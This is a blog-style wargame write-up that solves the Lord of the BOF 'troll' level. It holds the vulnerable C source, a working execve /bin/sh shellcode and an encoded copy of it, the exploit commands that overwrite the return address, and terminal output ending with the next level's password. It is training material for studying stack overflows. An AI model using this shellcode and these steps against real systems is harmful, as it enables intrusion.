[lob] orge -> troll (공부/LOB, 2014. 7. 30. 20:04)
[orge@localhost orge]$ cat troll.c
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern char **environ;
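/*
 * Entry point of the "troll" level.
 *
 * Takes exactly one command-line argument, wipes the environment, checks the
 * 48th byte of the argument and its length, copies it into a fixed-size stack
 * buffer, prints it, and clears both the buffer and the argument afterwards.
 *
 * Returns 0 on normal completion; every rejected input exits with status 0
 * via exit(0), as in the original.
 */
int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    /* Exactly one argument is required ("here is changed"). */
    if (argc != 2) {
        printf("argc must be two!\n");
        exit(0);
    }

    /* egghunter: zero every environment string in place, so nothing can be
     * staged in the environment. */
    for (i = 0; environ[i]; i++) {
        memset(environ[i], 0, strlen(environ[i]));
    }

    /* The byte at index 47 is read BEFORE the length check below, so an
     * argument shorter than 48 bytes makes this an out-of-bounds read
     * (undefined behaviour). Kept as in the original: the ordering is part
     * of the level. */
    if (argv[1][47] != '\xbf') {
        printf("stack is still your friend.\n");
        exit(0);
    }

    /* check the length of argument: at most 48 bytes are accepted ... */
    if (strlen(argv[1]) > 48) {
        printf("argument is too long!\n");
        exit(0);
    }

    /* ... but buffer holds only 40, so strcpy() can write up to 9 bytes
     * (48 + terminator) past its end. This stack overflow is the deliberate
     * bug of the level and is left in place; a hardened build would bound
     * the copy with snprintf(buffer, sizeof buffer, "%s", argv[1]). */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    /* buffer hunter: clear the local copy once it has been printed. */
    memset(buffer, 0, 40);

    /* one more!: clear the argument itself as well. */
    memset(argv[1], 0, strlen(argv[1]));

    return 0;
}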
//심볼릭 링크를 걸어서 실행
[orge@localhost orge]$ ln ./troll `perl -e'print "troll123"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\x27\xfc\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'?
argv[0] : BFFFFBA9 / ./?^12l?u楕凹2핽i00tii0cjo??T??
귁?
Segmentation fault (core dumped)
[orge@localhost orge]$ Xshell./t
bash2: Xshell./t: No such file or directory
[orge@localhost orge]$ ./trolla
argc must be two!
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\x27\xfc\xff\xbf"'`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'?
argv[0] : BFFFFBA9 / ./?^12l?u楕凹2핽i00tii0cjo??T??
귁?
Segmentation fault (core dumped)
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\xa9\xfb\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa₁
argv[0] : BFFFFBA9 / ./?^12l?u楕凹2핽i00tii0cjo??T??
귁?
bash$ ls
1 dump.h troll trolla ??^1??2?l??????u????????2?Qi00tii0cjo??QT???????
core test troll.c trolla.c
bash$
bash$ q
sh: q: command not found
bash$ exit
exit
[orge@localhost orge]$ rm perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
>
[orge@localhost orge]$ rm `perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
1 core dump.h test troll troll.c trolla trolla.c
[orge@localhost orge]$ ln -s troll `perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\xa9\xfb\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa₁
bash$ ls
ls: .: Permission denied
bash$ my-pass
euid = 508
aspirin